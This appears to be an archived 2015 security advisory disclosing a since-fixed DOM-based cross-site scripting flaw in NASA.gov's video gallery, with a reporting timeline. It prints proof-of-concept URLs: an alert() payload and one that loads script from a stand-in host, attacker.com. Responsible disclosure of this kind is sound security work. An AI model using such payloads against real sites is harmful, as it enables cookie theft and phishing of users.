exploit the possibilities

NASA.gov Cross Site Scripting

NASA.gov Cross Site Scripting
Posted Apr 1, 2015
Authored by Yann CAM

NASA.gov suffered from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 3f01be8803358f55b95e204b9006f9ad

NASA.gov Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: NASA.gov main-domain DOM-XSS
# Date: 01/04/2015
# Author: Yann CAM - Georges TAUPIN @ Synetis - ASafety
# Vendor or Software Link: www.nasa.gov
# Version: /
# Category: DOM-XSS
# Google dork:
# Tested on: NASA.gov main-domain
######################################################################

NASA description :
=======================================================================================

The National Aeronautics and Space Administration (NASA) is the United States government agency responsible for the civilian space program as well as
aeronautics and aerospace research.

There are several sub-domains and independent projects within NASA.
Those affected by this advisory are :

- NASA’s video gallery on main domain : DOM Cross-Site Scripting (RXSS)


Vulnerability description :
=======================================================================================
Reflected DOM XSS are available in nasa.gov main-domain above.
Through this kind of vulnerability, an attacker could tamper with page rendering, redirect victims to fake NASA portals, or capture NASA's users credentials such cookies.
These reflected XSS are on GET variables and are not properly sanitized before being used in page.


NASA’s main portal - video gallery - PoC :
=======================================================================================

- Proof of Concept (PoC), canonical DOM-XSS "alert()", tested on Firefox 35, Chrome 39 and IE 11:

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3Dalert(/RXSS/) />

or the same fully-url-encoded :

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%2f%52%58%53%53%2f%29%20%2f%3e

The previous link generates a JavaScript "alert()" box in the browser context.

- Proof of Concept (PoC), canonical DOM-XSS "loading third party JS script", tested on Firefox 35, Chrome 39 and IE 11:

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3D"var s%3Ddocument.createElement('script');s.setAttribute('src','http://attacker.com/x.js');document.getElementsByTagName('head').item(0).appendChild(s);" />


Screenshots :
=======================================================================================
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_001.png
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_003.png
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_004.png


Solution:
=======================================================================================

Fixed by NASA Portal's team.


Additional resources :
=======================================================================================

- http://www.nasa.gov/
- https://www.owasp.org/index.php/DOM_Based_XSS
- http://www.asafety.fr/vuln-exploit-poc/contribution-nasa-gov-portail-principal-dom-xss
- http://www.synetis.com


Report timeline :
=======================================================================================

2015-01-25 : NASA Portal's team was alerted by email through "contact form".
2015-01-26 : NASA Portal's team fixed the vulnerability
2015-04-01 : Public advisory

Credits :
=======================================================================================

88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security

Yann CAM - Georges TAUPIN - Security Consultants @ Synetis | ASafety

--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr | www.georgestaupin.com

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    31 Files
  • 15
    Feb 15th
    10 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close